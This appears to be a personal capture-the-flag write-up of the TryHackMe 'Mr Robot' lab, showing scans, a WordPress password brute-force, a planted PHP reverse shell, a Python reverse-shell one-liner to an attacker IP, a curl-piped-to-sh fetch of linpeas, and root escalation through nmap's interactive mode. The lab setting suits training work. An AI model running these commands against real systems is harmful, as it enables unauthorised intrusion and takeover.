skip to Main Content

thm – Mr Robot

ENUMERATION/SCANS

starting with the default scan

nmap -sVC 10.10.124.228  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-06 07:06 CEST  
Nmap scan report for 10.10.124.228  
Host is up (0.064s latency).  
Not shown: 997 filtered ports  
PORT    STATE  SERVICE  VERSION  
22/tcp  closed ssh  
80/tcp  open   http     Apache httpd  
|_http-server-header: Apache  
|_http-title: Site doesn't have a title (text/html).  
443/tcp open   ssl/http Apache httpd  
|_http-server-header: Apache  
|_http-title: Site doesn't have a title (text/html).  
| ssl-cert: Subject: commonName=www.example.com  
| Not valid before: 2015-09-16T10:45:03  
|_Not valid after:  2025-09-13T10:45:03 

and running dirb at the same time and wpscan

#dirb http://10.10.124.228   
 
-----------------  
DIRB v2.22      
By The Dark Raver  
-----------------  
 
START_TIME: Tue Apr  6 07:05:58 2021  
URL_BASE: http://10.10.124.228/  
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt  
 
-----------------  
 
GENERATED WORDS: 4612                                                            
 
---- Scanning URL: http://10.10.124.228/ ----  
==> DIRECTORY: http://10.10.124.228/0/                                                                                            
==> DIRECTORY: http://10.10.124.228/admin/                                                                                        
+ http://10.10.124.228/atom (CODE:301|SIZE:0)                                                                                     
==> DIRECTORY: http://10.10.124.228/audio/                                                                                        
==> DIRECTORY: http://10.10.124.228/blog/                                                                                         
==> DIRECTORY: http://10.10.124.228/css/                                                                                          
+ http://10.10.124.228/dashboard (CODE:302|SIZE:0)                                                                                
+ http://10.10.124.228/favicon.ico (CODE:200|SIZE:0)                                                                              
==> DIRECTORY: http://10.10.124.228/feed/                                                                                         
==> DIRECTORY: http://10.10.124.228/image/                                                                                        
==> DIRECTORY: http://10.10.124.228/Image/                                                                                        
==> DIRECTORY: http://10.10.124.228/images/                                                                                       
+ http://10.10.124.228/index.html (CODE:200|SIZE:1188)                                                                            
+ http://10.10.124.228/index.php (CODE:301|SIZE:0)                                                                                
+ http://10.10.124.228/intro (CODE:200|SIZE:516314)                                                                               
==> DIRECTORY: http://10.10.124.228/js/                                                                                           
+ http://10.10.124.228/license (CODE:200|SIZE:309)                                                                                
+ http://10.10.124.228/login (CODE:302|SIZE:0)                                                                                    
+ http://10.10.124.228/page1 (CODE:301|SIZE:0)                                                                                    
+ http://10.10.124.228/phpmyadmin (CODE:403|SIZE:94)                                                                              
+ http://10.10.124.228/rdf (CODE:301|SIZE:0)                                                                                      
+ http://10.10.124.228/readme (CODE:200|SIZE:64)                                                                                  
+ http://10.10.124.228/robots (CODE:200|SIZE:41)                                                                                  
+ http://10.10.124.228/robots.txt (CODE:200|SIZE:41)                                                                              
+ http://10.10.124.228/rss (CODE:301|SIZE:0)                                                                                      
+ http://10.10.124.228/rss2 (CODE:301|SIZE:0)                                                                                     
+ http://10.10.124.228/sitemap (CODE:200|SIZE:0)                                                                                  
+ http://10.10.124.228/sitemap.xml (CODE:200|SIZE:0)                                                                              
==> DIRECTORY: http://10.10.124.228/video/                                                                                        
==> DIRECTORY: http://10.10.124.228/wp-admin/                                                                                     
+ http://10.10.124.228/wp-config (CODE:200|SIZE:0)                                                                                
==> DIRECTORY: http://10.10.124.228/wp-content/                                                                                   
+ http://10.10.124.228/wp-cron (CODE:200|SIZE:0)                                                                                  
==> DIRECTORY: http://10.10.124.228/wp-includes/                                                                                  
+ http://10.10.124.228/wp-links-opml (CODE:200|SIZE:227)                                                                          
+ http://10.10.124.228/wp-load (CODE:200|SIZE:0)                                                                                  
+ http://10.10.124.228/wp-login (CODE:200|SIZE:2671)                                                                              
+ http://10.10.124.228/wp-mail (CODE:500|SIZE:3064)                                                                               
+ http://10.10.124.228/wp-settings (CODE:500|SIZE:0)                                                                              
+ http://10.10.124.228/wp-signup (CODE:302|SIZE:0)                                                                                
+ http://10.10.124.228/xmlrpc (CODE:405|SIZE:42)                                                                                  
+ http://10.10.124.228/xmlrpc.php (CODE:405|SIZE:42)
_______________________________________________________________  
        __          _______   _____  
        \ \        / /  __ \ / ____|  
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \  
           \  /\  /  | |     ____) | (__| (_| | | | |  
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|  
 
        WordPress Security Scanner by the WPScan Team  
                        Version 3.8.15  
      Sponsored by Automattic - https://automattic.com/  
      @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart  
_______________________________________________________________  
 
[+] URL: http://10.10.124.228/ [10.10.124.228]  
[+] Started: Tue Apr  6 07:09:02 2021  
 
Interesting Finding(s):  
 
[+] Headers  
| Interesting Entries:  
|  - Server: Apache  
|  - X-Mod-Pagespeed: 1.9.32.3-4523  
| Found By: Headers (Passive Detection)  
| Confidence: 100%  
 
[+] robots.txt found: http://10.10.124.228/robots.txt  
| Found By: Robots Txt (Aggressive Detection)  
| Confidence: 100%  
 
[+] XML-RPC seems to be enabled: http://10.10.124.228/xmlrpc.php  
| Found By: Direct Access (Aggressive Detection)  
| Confidence: 100%  
| References:  
|  - http://codex.wordpress.org/XML-RPC_Pingback_API  
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/  
|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/  
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/  
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/  
 
[+] The external WP-Cron seems to be enabled: http://10.10.124.228/wp-cron.php  
| Found By: Direct Access (Aggressive Detection)  
| Confidence: 60%  
| References:  
|  - https://www.iplocation.net/defend-wordpress-from-ddos  
|  - https://github.com/wpscanteam/wpscan/issues/1299  
 
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).  
| Found By: Emoji Settings (Passive Detection)  
|  - http://10.10.124.228/2e9e0a8.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'  
| Confirmed By: Meta Generator (Passive Detection)  
|  - http://10.10.124.228/2e9e0a8.html, Match: 'WordPress 4.3.1'  
 
[+] WordPress theme in use: twentyfifteen  
| Location: http://10.10.124.228/0/themes/twentyfifteen/  
| Latest Version: 2.9  
| Last Updated: 2021-03-09T00:00:00.000Z  
| Style URL: http://10.10.124.228/wp-content/themes/twentyfifteen/style.css?ver=4.3.1  
|  
| Found By: Css Style In 404 Page (Passive Detection)  
|  
| The version could not be determined.  
 
[+] Enumerating All Plugins (via Passive Methods)  
 
[i] No plugins Found.  
 
[+] Enumerating Config Backups (via Passive and Aggressive Methods)  
Checking Config Backups - Time: 00:00:04 <====================================================> (22 / 22) 100.00% Time: 00:00:04  
 
[i] No Config Backups Found.  
 
[!] No WPScan API Token given, as a result vulnerability data has not been output.  
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register  
 
[+] Finished: Tue Apr  6 07:09:19 2021  
[+] Requests Done: 58  
[+] Cached Requests: 6  
[+] Data Sent: 13.989 KB  
[+] Data Received: 132.619 KB  
[+] Memory used: 248.719 MB  
[+] Elapsed time: 00:00:16

checking the robots.txt first sometimes this can be pretty interesting ..

and there was the first flag of 3.. download the fsociety.dic and check the file..

looks like a wordlist starting with upper letters can be usernames therefore i removed duplicate entrys and started WPScan with user Robot and the fsociety.dic as passwordlist later then with user Elliot and so on.. ( to sort and remove duplicates from the list i use „sort fsocity.dic | uniq > fsocity_sort.dic“)

#wpscan --url 10.10.124.228 --wp-content-dir wp-admin --usernames elliot --passwords fsocity_sort.dic                         
_______________________________________________________________  
        __          _______   _____  
        \ \        / /  __ \ / ____|  
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \  
           \  /\  /  | |     ____) | (__| (_| | | | |  
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|  
 
        WordPress Security Scanner by the WPScan Team  
                        Version 3.8.15  
      Sponsored by Automattic - https://automattic.com/  
      @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart  
_______________________________________________________________  
 
[+] URL: http://10.10.124.228/ [10.10.124.228]  
[+] Started: Tue Apr  6 08:14:39 2021  
 
Interesting Finding(s):  
 
[+] Headers  
| Interesting Entries:  
|  - Server: Apache  
|  - X-Mod-Pagespeed: 1.9.32.3-4523  
| Found By: Headers (Passive Detection)  
| Confidence: 100%  
 
[+] robots.txt found: http://10.10.124.228/robots.txt  
| Found By: Robots Txt (Aggressive Detection)  
| Confidence: 100%  
 
[+] XML-RPC seems to be enabled: http://10.10.124.228/xmlrpc.php  
| Found By: Direct Access (Aggressive Detection)  
| Confidence: 100%  
| References:  
|  - http://codex.wordpress.org/XML-RPC_Pingback_API  
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/  
|  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/  
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/  
|  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/  
 
[+] The external WP-Cron seems to be enabled: http://10.10.124.228/wp-cron.php  
| Found By: Direct Access (Aggressive Detection)  
| Confidence: 60%  
| References:  
|  - https://www.iplocation.net/defend-wordpress-from-ddos  
|  - https://github.com/wpscanteam/wpscan/issues/1299  
 
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).  
| Found By: Emoji Settings (Passive Detection)  
|  - http://10.10.124.228/4bdcc94.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'  
| Confirmed By: Meta Generator (Passive Detection)  
|  - http://10.10.124.228/4bdcc94.html, Match: 'WordPress 4.3.1'  
 
[+] WordPress theme in use: twentyfifteen  
| Location: http://10.10.124.228/wp-admin/themes/twentyfifteen/  
| Last Updated: 2021-03-09T00:00:00.000Z  
| [!] The version is out of date, the latest version is 2.9  
| Style URL: http://10.10.124.228/wp-content/themes/twentyfifteen/style.css?ver=4.3.1  
| Style Name: Twenty Fifteen  
| Style URI: https://wordpress.org/themes/twentyfifteen/  
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...  
| Author: the WordPress team  
| Author URI: https://wordpress.org/  
|  
| Found By: Css Style In 404 Page (Passive Detection)  
|  
| Version: 1.3 (80% confidence)  
| Found By: Style (Passive Detection)  
|  - http://10.10.124.228/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'  
 
[+] Enumerating All Plugins (via Passive Methods)  
 
[i] No plugins Found.  
 
[+] Enumerating Config Backups (via Passive and Aggressive Methods)  
Checking Config Backups - Time: 00:00:03 <====================================================> (22 / 22) 100.00% Time: 00:00:03  
 
[i] No Config Backups Found.  
 
[+] Performing password attack on Xmlrpc Multicall against 1 user/s  
[SUCCESS] - elliot / ER28-0652                                                                                                     
All Found                                                                                                                          
Progress Time: 00:01:37 <======================================                                 > (12 / 22) 54.54%  ETA: ??:??:??  

User for WordPress check!! now it`s an easy game to gain access to the reverse shell. i took the i use most of the times when i work with wordpress with the error404.php 😀

Goto > Appearance > Editor > 404 Template > Change the Content from the page with the Reverse shell PHP and Press Update

https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Then you only have to open > http://10.10.99.181/wp-content/themes/twentyfifteen/404.php REPLACE SERVER/TEMPLATE and done.

I would recommend to spawn a real shell… most of the time python is installed.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.31.117",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

the second key is only readable with the user robot 🙁 i think the password.raw-md5 is the key for the user.. Download the file and start JOHN (first i tried with the dictionary we created before with no success later with the rockyou.txt

We got the Password, now change the user.. and get the flag 🙂

Escalation of Privileges

because i`m lazy i use linpeas.sh // run local webserver and on the target machine „curl http://10.11.31.117/linpeas.sh | sh“

after looking in thru the lines i found something interesting… nmap can be run as root //check gtfobins there is an easy way to run a shell as root

https://gtfobins.github.io/gtfobins/nmap/#sudo

robot@linux:/$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
# whoami
whoami
root

Back To Top